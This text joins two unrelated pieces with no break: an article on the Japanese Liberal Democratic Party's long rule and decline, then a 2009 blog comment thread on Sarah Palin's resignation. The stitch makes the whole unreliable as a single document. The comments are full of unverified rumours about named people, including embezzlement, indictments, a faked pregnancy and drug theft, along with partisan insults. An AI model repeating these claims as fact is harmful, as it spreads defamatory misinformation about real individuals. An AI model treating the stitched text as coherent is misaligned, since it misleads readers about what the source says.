A once - invincible party failed to adapt to wholesale changes in the social and economic model that it was set up to manage .
If its 54 - year rule really does come to a halt , that fact alone will confront both party and country with wrenching change and unprecedented uncertainty .
Few things more powerfully demonstrate the inbred character of LDP - dominated politics than its family background .
Mr Aso 's grandfather , Shigeru Yoshida , was the great statesman of shattered Japan 's post - war reconstruction .
Yoshida 's rule came to an end in 1954 when he was unseated as prime minister by his nemesis , Ichiro Hatoyama .
The next year the two men joined forces and the Liberal Party merged with the Japan Democratic Party to form the Liberal Democratic Party , which has dominated Japan 's politics ever since .
The man who will bring the LDP 's rule to an end this summer is Hatoyama 's grandson , Yukio Hatoyama , leader of the DPJ .
Family honour is demanding its due : for Shigeru Yoshida 's grandson , it is nobler to fall to Ichiro Hatoyama 's descendant than to succumb to mere LDP hoplites .
In any case , Mr Aso knows no one can save his party now .
That is because its history runs so deep .
Old Hatoyama and Yoshida formed the LDP as a bulwark against resurgent socialist parties and the political system they devised seems expressly designed to resist change .
The American occupiers had anyway pushed Japan in a conservative direction as early as 1948 , when the risk of communist revolution in Japan and China — to say nothing of the Soviet threat — had come to be seen as a greater peril than militarism .
The Korean war reinforced these priorities , while adding an economic dimension : the United States needed Japan 's economy to be humming again to help the war effort .
Thus developed Japan 's characteristic mix of anti-communist — even anti-civic — politics with state - directed development and policy set by bureaucrats .
Yoshida founded the Ministry for International Trade and Industry , MITI , whose bureaucrats were famously powerful .
Trust - busting efforts were quickly wound down after the second world war .
Oligopolies — in the form of the former zaibatsu conglomerates — were supported , even if they had been implicated in Japanese aggression .
A man accused of war crimes became a notable post - war prime minister and Yakuza gang bosses consorted with top politicians and helped put down left - wing protests .
The political and bureaucratic system was solidly made and has lasted , like so many things in Japan .
But its origins , and its effects on Japan , were ultimately rotten .
In some countries — Italy , say — incestuous politics is resented , mocked or circumvented by the rest of the country .
During Japan 's boom years , it seemed to be delivering the goods .
Outside the radical left , most Japanese were bought off by a social contract in which politicians , bureaucrats and big business arranged the country 's economic affairs .
Businesses won preferential finance and in return offered “ salarymen ” job guarantees and the dream of a middle - class life .
But the contract could be honoured only with high rates of growth , and the oil shocks of the early 1970s put paid to these .
Perhaps this might have been the end of the LDP , but political competition had been so stifled that there was nothing to take the party 's place .
Instead , the crisis of the 1970s led to a steep rise in corruption .
Factional competition within the party increased .
Fund - raising skills came to the fore ( in Japan , like America , politicians mostly finance their own campaigns ) .
So did the ability to fund public works in rural areas that were still the LDP 's base .
Corruption cemented local baronies and for a good while won votes .
Even today the late Kakuei Tanaka , an astonishingly corrupt prime minister , is more often praised than cursed .
The beginning of the end
A 19th - century Russian said that Europe 's democracies were moderated by corruption .
Japan had corruption moderated by democracy .
During the 1980s , the LDP managed to adapt itself somewhat to new political concerns , such as pollution and the success of issue - driven opposition figures in cities and prefectures .
The party even lost power briefly in 1993 and , in 2001 - 06 , a razzle - dazzle prime minister , Junichiro Koizumi , seemed to be giving it a new lease on life .
But by the time Mr Koizumi came along , the tension had become intolerable between the change - resisting features of politics on the one hand , and the reality of profound economic and social upheaval on the other .
Companies could no longer keep lifetime promises to workers yet the government failed to take over social - welfare obligations .
Women wanted better work prospects yet ministers would refer to them as “ breeding machines ” .
The demands of civic groups for more consumer protection were met grudgingly and late .
Now , the LDP has abandoned nearly all pretence at reform .
Though the party has plenty of modernisers , many — notably the so - called Koizumi 's children — will be the first to be swept out on August 30th while the old guard may survive better because they have their own sources of funding and support .
That the LDP is still so mired in the past shows both why its fall would be such an historic moment and why it would also be only the start of real change .
The party was the keystone of a political system that has long been crumbling .
To effect change means not just replacing the keystone but painstakingly rebuilding the arch .
READER COMMENTS ON
" EXCLUSIVE : PALIN RESIGNATION 'DAMAGE CONTROL ' FOR COMING ' ICEBERG SCANDAL ' ...
MORE : EMBEZZLEMENT INDICTMENTS COMING ? "
( 424 Responses so far ... )
COMMENT # 1 [ Permalink ]
... another joe said on 7/3/2009 @ 2:31 pm PT ...
Not fair to drop these kinds of smuggly drop these types of inuendos and hints ...
You have to tell Shannyn Moore that if this is what she really believes , she is gonna have to say more .
COMMENT # 2 [ Permalink ]
... Brad Friedman said on 7/3/2009 @ 2:55 pm PT ...
" You have to tell Shannyn Moore that if this is what she really believes , she is gonna have to say more . "
She will .
COMMENT # 3 [ Permalink ]
... nikto said on 7/3/2009 @ 2:59 pm PT ...
She was almost up to the " precious bodily fluids " part , but she ran out of time .
COMMENT # 4 [ Permalink ]
... Chrissy said on 7/3/2009 @ 3:00 pm PT ...
Huh ?
Where is your proof that her family did n't know until they were standing there w/ her making the announcement ??
That does n't make any sense .
Would n't they show some shock on their faces ??
COMMENT #5 [ Permalink ]
... Melanie Nathan said on 7/3/2009 @ 3:03 pm PT ...
Thats exactly what i said on my blog within .5 minbutes of the news breaking lol its so obvious ... big scandal on the way and Sarah wants to stay in control too late baby !
COMMENT #6 [ Permalink ]
... Juliana said on 7/3/2009 @ 3:04 pm PT ...
Only a group of whacked out hate filled left
wing nuts would make up stories about " damage control " & " iceberg scandals about to break " .
No different than the drunken sod on the corner of Hollywood & Vine rambling about the mothership about to land .
COMMENT # 7 [ Permalink ]
... Gatrio said on 7/3/2009 @ 3:06 pm PT ...
Time to destroy Romney !
COMMENT #8 [ Permalink ]
... another joe said on 7/3/2009 @ 3:08 pm PT ...
Juliana - the " drunken sod " you are referring to is that AWOL abusive alcoholic / cocaine addict stuffin ' socks into his crotch and having someone fly his drunken @ss onto an aircraft carrier and proclaiming " Mission Accomplished " , right ?
COMMENT #9 [ Permalink ]
... Caren said on 7/3/2009 @ 3:19 pm PT ...
WTF ?
Is Shannyn Moore trying to be famous by making things up ?.
Sounds like a boatload of crap .
The left has hit the panic button .
BIG TIME .
COMMENT # 10 [ Permalink ]
... Brad Friedman said on 7/3/2009 @ 3:33 pm PT ...
" Panic " ?
Think again about whose hitting that button , Caren .
COMMENT # 11 [ Permalink ]
... another joe said on 7/3/2009 @ 3:40 pm PT ...
LOL caren !
repug " family values " folks are fallin ' at a rate of at least one a week lately and now it is being demonstrated that the public option will actually SAVE money ...
And you want to talk crap about dems hittin ' the PANIC BUTTON while repug pundit 's heads are exploding and their political strategists are sh#ttin ' their pants !
It is funny how the latest news out of AK has brought out trolls to ALL of the sites that tend to support dems .
It is n't the folks on the LEFT that are hittin ' the panic button , baby - the latest is actually on the other side - palin .
Do ya suppose she was boofin ' " first dude 's " business partner again ?
COMMENT # 12 [ Permalink ]
... Patrick said on 7/3/2009 @ 3:41 pm PT ...
What with Obama 's crappy socialist plans slowly unraveling , much like his ratings , I 'd say his gang of Chicago thugs are the ones panicking .
COMMENT # 13 [ Permalink ]
... Where 's Keith ? said on 7/3/2009 @ 3:44 pm PT ...
I 've always suspected that she 's had an abortion .
It 's either that or the house they built using tax payer money .
COMMENT # 14 [ Permalink ]
... Brad Friedman said on 7/3/2009 @ 3:47 pm PT ...
Silly , Patrick .
While there 's plenty to hit Obama on , you seem to be in utter denial about the problems your party faces , and their failure in effectively taking on Obama and the Dems on any of the stuff they * should * be taking them on for .
Frankly , if you guys were doing your job , they * should * be panicking , but they certaintly are n't .
No matter what you wingnuts keep telling each other .
Hint :
That whole " socialist " thing is so 2008 .
Did n't work then .
Wo n't likely be working now or in ' 10 or even in ' 12 .
But feel free to keep missing the point and banging on it !
COMMENT # 15 [ Permalink ]
... Agent 99 said on 7/3/2009 @ 3:52 pm PT ...
I say Pig Lips on her way to School of the Americas to do some heavy duty learning about presidenting ....
COMMENT # 16 [ Permalink ]
... jim said on 7/3/2009 @ 3:55 pm PT ...
if the right is n't panicking by now , they should be !
is it kind of unfair to say the other show is gonna drop in a week or so if you call yourself a journalist unless you have proof and then you should be obligated to getting it out there .
however if shannyn is not a journalist she can speculate just like the rest of us .
COMMENT # 17 [ Permalink ]
... Agent 99 said on 7/3/2009 @ 3:56 pm PT ...
And , seriously , Patrick , Obama has proven his vampire capitalist street creds beyond a shadow of a doubt .
Get with the program .
COMMENT # 18 [ Permalink ]
... SecretOps8 said on 7/3/2009 @ 4:05 pm PT ...
Is this what you liberal fascists do ?
Try and find someone else to destroy ?
Its no longer politics , its personal destruction .
You 've learned well at the foot of the Clinton 's evidently .
Your esteemed Leader
The Kenyan is likely done trying to force yet another threat out of politics , that 's fine .
Someone will step up and beat his ass down in ' 12 because he was a one termer to begin with .
His grand remake of America into a socialist state with high unemployment and Soviet programs wo n't have the middle America support he once had .
He 's at - 2 right now and falling .
He 's worse than Carter ever was .
COMMENT # 19 [ Permalink ]
... Caren said on 7/3/2009 @ 4:06 pm PT ...
We 're witnessing a huge amound of hand wringing from the left upon hearing this announcement from Governor Palin .
If she was n't such a threat , why waste such a huge amount of hot air expelling obcenities and insults in her direction ?
You surely do n't see libtards hurling expletives at John Edwards .
The Obamabots see their ' Change ' rapidly vanishing .
Of course , that 's what you get when you vote for a slogan .
Per Governor Palin , " ONLY DEAD FISH GO WITH THE FLOW " YOU BETCHA !
COMMENT # 20 [ Permalink ]
... Trixie said on 7/3/2009 @ 4:10 pm PT ...
Wow .
I think Palin could have gotten her point across in about 3,000 less words .
What exactly was all that about ?
" wasting millions of dollars " " working outside the government " ?
Is she getting a gig on The View ?
Watching her rambling excuses with my experience reading people , she was tap dancing .
Something else is going on .
And that part about ' I asked my children if they want me to do something outside of government to help little children everywhere ' , they said YES !
That was so ridiculously unnatural .
Ca n't wait for the truth about this .
You do n't just abandon your Governorship like that .... regardless of your ambitions .
No way .
COMMENT # 21 [ Permalink ]
... Shannon Williford said on 7/3/2009 @ 4:13 pm PT ...
Repub damage control anyone ?
What are we doing with several pro-Palin sounding posters at Bradblog ?
Have the trolls spread our to help poor Sarah all over the blogasphere .
At least the media might get off Michael Jackson for awhile ... shw
COMMENT # 22 [ Permalink ]
... Stacia said on 7/3/2009 @ 4:15 pm PT ...
Why on earth would Democrats be wringing their hands over this ?
Well , I guess some would be upset because they know that 2012 will no longer be the year we can expect the tragicomedy known as Palin 's presidential run ; there 's no way she can run now .
Nice blog , Brad .
Sorry about your commenters though .
Yow .
COMMENT # 23 [ Permalink ]
... Floridiot said on 7/3/2009 @ 4:22 pm PT ...
# 18 L O fukin L , That was he larry us
COMMENT # 24 [ Permalink ]
... Ginny in CO said on 7/3/2009 @ 4:28 pm PT ...
Having had up close and personal experience with the AK GOP from 80 to 94 , the fact that so many people all over the media immediately began speculating on the other shoe is quite rational .
Sarah was the perfect example of the person who appeared to be what they wanted / needed ( not just physically - that was gravy ) .
From my perspective the GOP got what was coming to them .
The fervor to elect people who toe their line , repeating the policy and platform got them the ones who could only parrot , not explain how to apply it since they do n't understand the abstract .
The success that they had with it warped their perception , it never occurred to them that a state would actually elect someone and continue to highly approve of her , who was nothing more than a capable sports anchor with ambition and overconfidence in her ability .
That she could function as she did in the office and not have a brighter than average bulb .
Blind to the fact that Alaska politics is virtually straight GOP .
If the oil industry says jump , they ask how high while going up .
My guess on the shoe would include their house that was built by workers from the company that built Wasilla 's budget breaking sports complex .
Very close to the Palin 's lakefront house , at the same time the complex was under construction .
Hey , Uncle Ted ( Stevens ) got his remodeled by VECO .
It must be OK .
This is only a guess .
Sarah has proven herself to be unpredictable .
Not a good trait for governors , VPs or POTUS .
COMMENT # 25 [ Permalink ]
... Ernie said on 7/3/2009 @ 4:28 pm PT ...
Agent 99 the only thing Obama has proven at this point it that his administration is the embodiment of the amateur hour .
We will be paying for his myopic vision for years .
COMMENT # 26 [ Permalink ]
... Stephen Crockett said on 7/3/2009 @ 4:39 pm PT ...
Even Fox News aired some speculation about Palin 's motives concerning her resignation .
It is very possible that an upcoming scandal could be breaking .
It is also possible that Palin is just being herself and demonstrating her lack of political professionalism and sense of political responsibility .
If the voters elect you to do a job , you should finish your term if humanly possible .
Unless faced with serious scandal or health issues , it is not very responsible to walk away from your duties .
COMMENT # 27 [ Permalink ]
... Caren said on 7/3/2009 @ 4:43 pm PT ...
There is no ' scandal ' .
Once again , more panic buttons being pressed by the left .
Nothing to see here , move along .
COMMENT # 28 [ Permalink ]
... Billman said on 7/3/2009 @ 4:56 pm PT ...
Oh , please please please let there be more to this !
And by my estimation , I am reasonably sure there will be .
No one in the political world gives up their position for no reason .
If she was willing to go through all the B.S. thrown at her about her out of wedlock grandson from her high - school age daughter when spouting her " family values " , and all the other hypocritical stuff she was a part of .
Why would she bow out now and give up the little bit of ability she has to protect herself with the power of her office ?
I 'm bettin ' there is more to this story , and it is going to be gooood and juicy .
The question is ;
Will the mainstream media run with it like like a Micheal Jackson child molestation charge , or more the Sibel Edmonds information ?
For some reason , I suspect the latter .
COMMENT # 29 [ Permalink ]
... Dave said on 7/3/2009 @ 4:56 pm PT ...
My money is on disclosure that Trig is her daughter's .
Unlike Obama , Trig 's birth certificate has never been disclosed let alone a picture of her holding the baby in the hospital .
She lied .
Her credibility is even more shot .
COMMENT # 30 [ Permalink ]
... John said on 7/3/2009 @ 4:59 pm PT ...
Heh .
Wild speculation aside , it 's amusing to see the excuses flying for Whatever Sarah 's Done Now .
On cue , we even get the muttered hints that it 's all Obama 's doing .
Nope .
Palin , who has yet again hit the panic button , owns this one .
Where will her defenders be when this resignation , like all the others , is revealed to coincide with yet another tawdry scandal ?
When will they admit that she 's just another entitled conservative unequipped to do the freakin ' job ?
COMMENT # 31 [ Permalink ]
... Kenneth E. Tucker said on 7/3/2009 @ 5:02 pm PT ...
wow ... do n't even know where to start ... but , how about with ' quitting ' because she 's taking so much ' heat ' from AK legislators . a ) what happened to the Palin that explained how to tell the difference between a pit bull and a hockey mom , lipstick " ?? b ) what happened to the palin that admonished the Obama camp during the campaign to " get out of the race if they could n't stand the heat in the kitchen " ??
NO ONE voluntarily walks away from a governorship for NO GOOD REASON ( S ) [ which none of her 's , scatter - brained as they were , are ] so ... i'm leaning towards the ' iceberg ' ( MUCH more below the surface ) argument .
afterall , it was just a week ago hen we were told DEFINITELY by Gov Sanfor 's staff that he ' just needed some alone time to recoup and / or work on his book while hiking the Appalachian Trail , right ?
Let 's ' talk ' again in a week .
COMMENT # 32 [ Permalink ]
... Dem said on 7/3/2009 @ 5:07 pm PT ...
Stop referring to our democratically elected American - born president as " The Kenyan " .
It 's stupid and immature .
COMMENT # 33 [ Permalink ]
... Kenneth E. Tucker said on 7/3/2009 @ 5:16 pm PT ...
one more ' thing ' ... that leads me to believe there 's another ( Neiman Marcus Italian pump more than likely ) ' shoe ' to drop : if Caribou Barbie learned ANYTHING on the campaign trail with the whoremonger McCain it was to ' get out in front ' of impending bad news .
like his proactive rollout of Cindy 's STEALING prescription drugs from the doctors group who she was working with as the FBI was about to arrest her .
( See his hometown newspaper - Arizona Republic for the low [ and i do mean LOW ] down on that junkie beer heiress trophy wife ( years ago ) of his .
i repeat , let 's ' meet ' again in a week and see what 's ' cookin ' .
COMMENT # 34 [ Permalink ]
... Phaedrus said on 7/3/2009 @ 5:17 pm PT ...
The right is in complete disarray .
Republicans cheer about Obama's " plummeting " popularity while 7 of the 10 leading economic indicators are up this month .
Cap and Trade will prove to be exactly what was advertised
aka a jobs bill and the democrats will be as unstoppable as they were before the civil rights era .
James Carville is right the left will dominate for the next forty years .
Get used to the idea of universal health care because it 's coming , and once it's here and everyone sees what a load of crap all of the right wing fearmongering for the last 40 years has been you 'll have to wait for this entire generation to die off in order to elect a county coroner .
The right 's best bet at this point is to run Mccain again in 2012 .
COMMENT # 35 [ Permalink ]
... pelican said on 7/3/2009 @ 5:21 pm PT ...
I think She is going to be the next Al Gore , only in reverse .
As in Drill baby drill .....
COMMENT # 36 [ Permalink ]
... One Opinion said on 7/3/2009 @ 5:38 pm PT ...
I hope that Palin will survive , and continue to stymie both the right and the left , especially the misogynists , and fanatics , of any political persuassion .
I take great delight in the fact that she scares the hell out so many elite , entitlement prone politicians , and their supporters , on both sides .
She is the one bright light in all of the current muck , doom , and murkiness .
She quite wryly gladdens this old eccentric , socially liberal , fiscally conservative Dem .'s heart .
I am so tired of the status quo , corporate owned , " we know it all " , politicians from both ( or is there just one , mirrored ? ) parties .
I see no hope , nor change from either ; so Palin at least provides a bit of realism to an otherwise stale , stagnant , screw us all , political landscape .
I wish her great success in whatever comes after , and truly hope she continues to perplex , and wreak havoc unto all !
COMMENT # 37 [ Permalink ]
... GustavMahler said on 7/3/2009 @ 5:49 pm PT ...
WOW , there are alot of trolls here today .
Great job Brad , this is the iceberg the Alaskan blogs have been talking about .
We knew about the suspicious construction of her house , I do n't know why the story was dropped by the MSM .
Palin has alot of skeletons in her closet and I thought her fake pregnancy would be exposed but this makes much more sense .
She had to resign before this story broke , she cannot coverup a federal investigation only her own ethics violations that were dismissed by people she appointed .
Her rambling , incoherent speech must have meant that she found out the hammer was going to drop yesterday or within the past few days .
I looked at a pro-Palin blog and they are calling her move ' brilliant ' setting up her run for 2012 .
HA ! and they talked about Obama voters drinking KoolAid ??
COMMENT # 38 [ Permalink ]
... One Opinion said on 7/3/2009 @ 5:55 pm PT ...
Sorry , my comment should have read : " far - right and far - left " , rather than simply left and right .
I actually have no problem with true " left and right " .
They actually have a center , where one ends and the other begins .
At least , creating the possibilty , however far - fetched , that perhaps someday politicians ( prompted by some sort of endemic outbreak of sanity ) might try to govern , as nearly as possible , for all of us ( the people ) rather than special interests .
I will not , however , hold my breath .
COMMENT # 39 [ Permalink ]
... Jade said on 7/3/2009 @ 5:57 pm PT ...
The story about the Palin house was floating around during the general election campaign .
Read about the Palin house and Sports complex here :
http://www.dailykos.com/...0/11/111018/34/47/627460
COMMENT # 40 [ Permalink ]
... Agent 99 said on 7/3/2009 @ 6:00 pm PT ...
Sheesh .
Evidently we 've got the Britney Spears of politics thing going for us here .
Sometimes I 'm just sure a bread truck mowed me down and I 'm really in a coma somewhere ....
COMMENT # 41 [ Permalink ]
... tim snead said on 7/3/2009 @ 6:07 pm PT ...
It just looks like a lot of trolls .
Actually it's 8 different handles and Caren posting in multiples , out of 38 posts .
And most of them commenting early because they 're paid to troll lots and lots of sites .
So many liberal blogs , so little time for paid republican flacks .
COMMENT # 42 [ Permalink ]
... omar younis said on 7/3/2009 @ 6:09 pm PT ...
does anybody know what the hell she is talking about ?
COMMENT # 43 [ Permalink ]
... sauerkraut said on 7/3/2009 @ 6:14 pm PT ...
Very good , Brad .
Let 's hope it's true so that Alaskan taxpayers can see how they 've been ripped off over the years .
But if you are wrong .
... ut oh !
COMMENT # 44 [ Permalink ]
... another joe said on 7/3/2009 @ 6:16 pm PT ...
Is THIS the iceberg ?
According ALASKA REPORT , there are three ( count ‘ em … THREE ) ethics complaints against Governor Sarah Palin coming down the pike .
Mention is also made of a “ long simmering embezzlement / IRS scandal ” that is still being looked at by the feds .
Embezzlement from this trust may be involved .
Because this is being investigated by IRS and FBI , palin is powerless to use her office to block the probe , hence she 's goin ' down and bailed out early .
COMMENT # 45 [ Permalink ]
... Sean Larabee said on 7/3/2009 @ 6:38 pm PT ...
Is it possible that the scandal that may be about to break is that trig is not her baby ?
I never put a whole lot of stock in that rumor but the events surrounding the birth have always struck me as odd .
COMMENT # 46 [ Permalink ]
... Jane said on 7/3/2009 @ 6:47 pm PT ...
@ caren , About those dead fish going with the flow , trust me , Palin should know as that is her next route - flowing with the rest of the fallen rethuglicans .
Apparently , Palin could not focus on Alaska 's real problems ...
Drop out rate : Double US average
http://www.adn.com/education/story/590870.html
M eth Capital of America
http://andrewsullivan.th.../09/wasilla-the-met.html
Heating Oil Prices
http://www.adn.com/news/.../rural/story/643556.html
COMMENT # 47 [ Permalink ]
... David said on 7/3/2009 @ 6:59 pm PT ...
Yes , it was all Obama 's fault that the Palins stole from taxpayers to build their house .
It must have been the socialists that made them do it .
I bet they worked with the seceret muslims to take down this good christian family .
Yep ,
The Republicans are the poor victims , they never do anything wrong .
It 's time to be " Strong on Crime " and send the Palins to jail for a long time , right ?
Only thing missing today was the ' 4 more years ' double peace sign ...
COMMENT # 48 [ Permalink ]
... Big Text said on 7/3/2009 @ 7:00 pm PT ...
HERE'S WHAT'S ABOUT TO BREAK ( NOTE THE DATE JUNE 30 ) : Published : March 4th , 2009 09:25 PM
Last Modified : March 4th , 2009 09:26 PM
Former Veco chief executive Bill Allen and a Veco vice president , Rick Smith , wo n't have to worry about prison again until at least June 30 , when federal prosecutors will present another status report on their cooperation in the long - running FBI investigation .
U.S. District Judge John Sedwick accepted the most recent status report , filed under seal Tuesday by prosecutors from the U.S. Attorney 's office in Anchorage .
He agreed to allow the filing in secret " because it relates to on - going investigations , " he wrote in an order .
Sedwick 's order was the fifth time he has delayed sentencing and asked for status reports since the two men pleaded guilty in May 2007 to corrupting Alaska legislators .
Their trial testimony has since led to guilty verdicts against two legislators and former U.S. Sen .
Ted Stevens .
Federal guidelines entitle Allen and Smith to shorter sentences if they continue to cooperate until they are no longer needed .
The latest delay is the strongest indication yet that the government is still pursuing its investigation despite setbacks following the Stevens conviction , including an FBI agent who claimed another agent and prosecutors violated Justice Department policy and may have broken the law .
The four - month delay before the next status report is substantially shorter than the previous delay , which was seven months .
Assistant U.S. Attorney Joe Bottini said there was nothing significant about the disparity other than the belief of prosecutors that the judge preferred a shorter period .
Two earlier delays were three months each , and a third was sixth months .
COMMENT # 49 [ Permalink ]
... Drew J Jones said on 7/3/2009 @ 7:17 pm PT ...
Long time no talk , Brad .
Great work .
COMMENT # 50 [ Permalink ]
... Bob In Pacifica said on 7/3/2009 @ 7:19 pm PT ...
COMMENT # 15 [ Permalink ]
... Agent 99 said on 7/3/2009 @ 3:52 pm PT ...
" I say Pig Lips on her way to School of the Americas to do some heavy duty learning about presidenting .... " ---
Funny you should say that .
There was a stretch in her ramblings where she was talking about the Constitution and a new way of leading and I got this creepy feeling that she was about to announce that the Joint Chiefs of Staff had chosen her to be the figurehead for a coup .
Except that the military seems to be getting everything it wants already and it's hard to believe anyone would put someone who sounds like a speedfreak on a weeklong jag in front of a microphone .
COMMENT # 51 [ Permalink ]
... zizzyphus said on 7/3/2009 @ 7:29 pm PT ...
10/13/08 : Massive Palin Scandal Brewing « roger hollander
http://rogerhollander.wo...e-palin-scandal-brewing/
COMMENT # 52 [ Permalink ]
... karen said on 7/3/2009 @ 7:33 pm PT ...
by the way , scandal or not , she is quitter , quit colleges , quit energy board job she did n't like , used corruption excuse and got lucky with corruption scandal that launched her into governor office .
Whats with all the trolls on Palin , why is it so necessary to get off this topic ?
like it would work ...
Palin manic - ness and unpreparedness is THE indication there is something else going on then just looking for better career pastures , getting out of spotlight .
She was wicked short of breath , not normal for some in good shape .
She is freaking out , there has to be some stuff really scaring her , and I want to guess scaring her beyond just her political career , like a family thing or criminal / jail thing .
She must have had an intelligent advisor give her a come - to - Jesus talk to explain to her how much trouble she is in .
Also , the sloppy speech says her political cred is the least of her worries right now .
COMMENT # 53 [ Permalink ]
... Kenneth Mark Hoover said on 7/3/2009 @ 7:42 pm PT ...
I can see another RepubliKan meltdown from my doorstep .
COMMENT # 54 [ Permalink ]
... isis said on 7/3/2009 @ 7:47 pm PT ...
There will be no way to put lipstick on this Pig that 's coming down the pike .
This investigation , evidently , has been ongoing for at least 9 months .
This devious , calculating and now incompetent woman does nothing but play in the weeds with trivial nonsense so you KNOW that her " quitting " has everything to do wit quid pro quo .
Ironically , ( and you see this with flagrant criminals often ) she chooses to stand and " show off " her quid pro quo in an attempt to deflect the ovious assumption that if she had a brain in her head , the last thing she would do would be to stage something as public as this at a potential " crime scene " .
That 's precisely WHY she chose this location .... that and the birds cuckooing behind her .
Is it called foreshadowing ( cuckoo ) or just appropriate sound effects ?
The SS Palin will be sunk for a very long time by the forthcoming Iceberg Scandal .
Stay tuned ......
COMMENT # 55 [ Permalink ]
... apophiswillkillus said on 7/3/2009 @ 7:49 pm PT ...
This delusional dummy called Sarah Palin will be going to prison for a long time .
I say they give her life .
This is not the end of the Palin meltdown ...
COMMENT # 56 [ Permalink ]
... David said on 7/3/2009 @ 7:49 pm PT ...
So if she is indicted and found guilty , all you Repubs are going to apologize for your mistake and the name calling , right ?
Or are you not that mature .
COMMENT # 57 [ Permalink ]
... another joe said on 7/3/2009 @ 7:51 pm PT ...
WTF - the feds are closing in on the repugs Godiva and trolls here want to proclaim that dems are hitting the " panic button " !
GOP needs to send out smarter trolls - this nonsense is being posted all over the liberal / progressive bloggosphere in massive quantities , so it 's just not a few disconnected wackos that love abuse .
COMMENT # 58 [ Permalink ]
... isis said on 7/3/2009 @ 7:52 pm PT ...
" Palintology :
Only dead fish go with the flow and you 're rght now looking at my quid pro quo .... "
This woman is a national joke .
COMMENT # 59 [ Permalink ]
... puppiesandkittensandrainbows4u said on 7/3/2009 @ 7:53 pm PT ...
one national celebrity freakshow ends , another rises to accept the throne .
i hope this is the beginning of a decades long reality show watching this looney tweaker unravel every so often on tv .
COMMENT # 60 [ Permalink ]
... isis said on 7/3/2009 @ 7:54 pm PT ...
Palin 2012 : Campaign Motto - Winners NEVER quit and Quitters NEVER win .
Take your $ 250,000 illegal wardrobe and hit the road Jack .
COMMENT # 61 [ Permalink ]
... William Jensen said on 7/3/2009 @ 7:55 pm PT ...
I do n't know about a possible indictment - it seems to be a stretch - but it all seems rather odd .
This lady is a trainwreck and the best thing for the Republicans is to see her gone .
Remember , about half the Republicans want her to run and all the Democrats do .
COMMENT # 62 [ Permalink ]
... karen said on 7/3/2009 @ 7:59 pm PT ...
Please do n't bother responding to trolls , they are just sent to gum things up and distract .
Man , tho , what a waste of money and peoples time , do they really think trolling lefty sites is going to change anyones mind or muddy the issue .
Might help a bit swaying some opinion of moderates on general topics like health care or such , but really , speculation about Palin 's motives , whats the about .
And if this happened as quickly as it appears it , how to the rally all these trolls so quickly on a holiday weekend ?
Would really like to know what they are doing behind the curtain
COMMENT # 63 [ Permalink ]
... S in PA said on 7/3/2009 @ 8:04 pm PT ...
When I first heard of her resignation , I must admit that my first thought was that maybe some old " Beaver Hunt " photos surfaced , but the corruption thing sounds more plasuible .
COMMENT # 64 [ Permalink ]
... isis said on 7/3/2009 @ 8:08 pm PT ...
# 48 : The timing would be perfect for this next report by federal prosecutors with just enough time for her to write this speech and plan the resignation .
No doubt then that this report about the Veco execs ' singing ' in exchange for shorter sentencing has everything to do with today ' latest chapter in the Palin 's Circus .
COMMENT # 65 [ Permalink ]
... David said on 7/3/2009 @ 8:10 pm PT ...
# 18 , you said we learned at the feet of Clinton , do you mean how the Republicans spent over a year and millions of tax dollars investigating a BJ , and when he tried to bomb Bin Laden in Afganistan you said he was " wagging the dog " and called it war crimes ?
And then when you used that BJ to get Bush in office , you let big businesses screw the American Public for money all while they were cutting the social programs you could have used to get an education ?
Is that what you were refering to ?
The way the republican party uses bullshit like immigration to keep the ignorant and bigoted Americans riled up and voting for them ?
Is that what you meant ?
Because that is what I learned before I decided that the GOP trying to kill America and switched parties .
COMMENT # 66 [ Permalink ]
... cowboyneok said on 7/3/2009 @ 8:18 pm PT ...
Republicans and conservatives have had lots of fun glibly dismissing us as " libs . "
I think its time we coined a new term for them " cons " as in " convicts . "
Conservatives are " cons " because its obvious if they are n't in legal or some kind of " family values " trouble all you have to do is wait awhile and the " cons " never disappoint !
I guess we should all just be thankful this scandal , so far , does n't involve sex in dirty diapers , gay meth prostitutes , snuff films , child sex or other sick Republican shit .
And before any Republicans start moaning and bitching that Democrats " do it , too . "
Yea , maybe so , but its the HYPOCRISY and the face Republicans NEVER seen to lose their jobs or experience the same consequences when it occurs to them versus Democratic politicians .
When is the last time a sex scandal has hit a " con " and he got impeached or lost his job over it ?
Senator " dirty diapers " Vitter ?
Nope ... Senator " wide stance " Larry Craig ... another nope ...
Family Values is just a hypocritical way for them to troll for votes from those who are scared to death if they do n't vote Republican then someone might think they are the perverts they secretly are !
One finger pointing out , and FOUR pointing back at themselves !
COMMENT # 67 [ Permalink ]
... Have Gone said on 7/3/2009 @ 8:32 pm PT ...
Bravo , Bradblog .
We can't wait to see how this bizarre " iceberg " story line develops !
COMMENT # 68 [ Permalink ]
... Jes Evans said on 7/3/2009 @ 8:43 pm PT ...
You " big city " people kill me .
Wasilla is a SMALL town .
You can't help but hire people you may already know and chances are , you just might have even gone to elementary school with them .
Oooh !
Big scandal !
And to those doubting that Mr. Palin might have actually done a lot of work on his own house , you clearly underestimate " small town " people .
I know plenty of people who 've built their own houses and have a lot of other irons in the fire at the same time .
That 's just the kind of people we are .
Of course , if any of this turns out to be true , you gotta hand it to good ol '
Sarah for fooling all the idiots out there all this time .
Go Sarah !
LOL !
COMMENT #69 [ Permalink ]
... Luc said on 7/3/2009 @ 8:47 pm PT ...
omg ... after watching this speech , all i can ask is , " is she on drugs ? " scary stuff .
can we vote for alaska to secede ?
COMMENT # 70 [ Permalink ]
... Sarah said on 7/3/2009 @ 8:48 pm PT ...
This is all speculation & it is a but of B.S. Libs are doing anything they can to make this out to be a scandal !
COMMENT # 71 [ Permalink ]
... Emit said on 7/3/2009 @ 8:50 pm PT ...
Amid all the speculation , what strikes me as the most obvious and most certain lie taking place is the assertion that this has been in the works for any significant length of time at all .
Anderson Cooper just asked her long time spokesperson by telephone whether this has been in the works for a while , as Palin stated .
She replied yes .
Anderson then followed up ( not verbatim ) .
' Why are you in New York if this has been planned for a while , and not with her in Alaska , where the announcement was made ??
The spokesperson answered that she had a Blackberry and ' technology is beautiful '!!!!!
Are you kidding me ?
People @ ' press conference ' are saying it was painfully obvious that it had been thrown together mere hours before it took place .
It appears no prominent Alaska brass or Governor brass knew anything till perhaps Wednesday .
This is so obviously a severely panicked bail !!!
COMMENT # 72 [ Permalink ]
... another joe said on 7/3/2009 @ 9:01 pm PT ...
So that 's the palin mansion ?
no wonder her teen daughter is able to have unprotected sex anytime shw wants ( which , evidently is quite often ) .
The place is huge !
COMMENT # 73 [ Permalink ]
... Canoe said on 7/3/2009 @ 9:04 pm PT ...
That is one ugly house !
I hope they did n't spend any of their own money on it .
